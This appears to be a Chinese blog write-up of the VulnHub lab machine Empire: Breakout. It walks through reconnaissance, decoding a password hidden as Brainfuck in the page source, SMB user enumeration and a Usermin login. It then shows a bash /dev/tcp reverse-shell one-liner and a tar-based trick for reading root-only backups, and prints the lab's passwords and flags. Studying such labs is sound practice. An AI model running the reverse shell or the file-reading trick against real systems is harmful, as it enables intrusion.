Vulnhub项目:EMPIRE: BREAKOUT

一、靶机地址

靶机地址:Empire: Breakout ~ VulnHub

靶机介绍:

该靶机被定义为简单,但是如果没有找到,那就难度成中等了!

二、渗透过程

老三样,发现目标,这里用 arp-scan

确定靶机 ip:192.168.56.154,本机 ip:192.168.56.14,利用 nmap 探测靶机开放端口

开放 80、139、445、10000、20000,那就一个一个来,80 探测目录,查看主页 

没得东西,换个 gobuster

也没得东西,访问,啥玩意没有,陷入僵局,查看源代码,可以直接理由页面查看,也可以用 curl

利用,curl 请求网页

一不小心,在最下面,不讲武德,发现了一串串小东西,ctf 里面的 brainfuck 加密

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

CTF在线工具-在线Brainfuck加密|在线Brainfuck解密|Brainfuck|Brainfuck原理|Brainfuck算法

.2uqPEfj3D<P'a-3    #解密出来是这个,一串密码

访问 10000 和 20000,需要 ssl,那就上 https

 两个界面,一个 webmin,一个 usermin

 现在有密码,没有用户,回想之前开放端口,有 smb

那就枚举一下用户   enum4linux -a 192.168.56.154 

发现了 local user  cyber,登录 20000 的系统,是个邮箱,页面中找到了有终端,奈斯~

浅浅的查看一下,发现 user.txt,获取 flag1

3mp!r3{You_Manage_To_Break_To_My_Secure_Access} 

弹个 shell 到 kali 上 

bash -i >& /dev/tcp/192.168.56.146/1234 0>&1 

刚才还看到了个 tar 压缩程序,为毛会出现在这,肯定后面会用到 

去这个站底下瞅瞅,发现了 backups,备份哈,肯定有密码之类的东西 

这不是,它就来了,可惜了,权限不够啊 

换个思路,用刚才的那个 tar 压缩个包,然后重新解压一下,那个权限不就有了么,大聪明!哈哈

这里一定要在根目录下利用./tar 这样用,不然,这个机器上的 bin 目录里面肯定还有个 tar,会达不到想要的效果,然后再解压一下下,轻松愉快读取密码 

Ts&4&YurgtRX(=~h    #还怪长呢,直接su,输入密码,提权为 root

3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation} 

 欧克,flag2 获取,渗透结束,轻松愉快~

三、思路总结

1、好好的信息收集,收集不仔细,思路就没得了

2、常用思路,发现目标,探测目标开放服务,收集目录,找到能执行命令或者上传的地方

3、获取 shell 后,提权不一定需要内核漏洞或者其他什么方式,最顶级的食材往往仅需简单的烹饪~,能够找到密码,就很舒服了

4、继续努力!

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值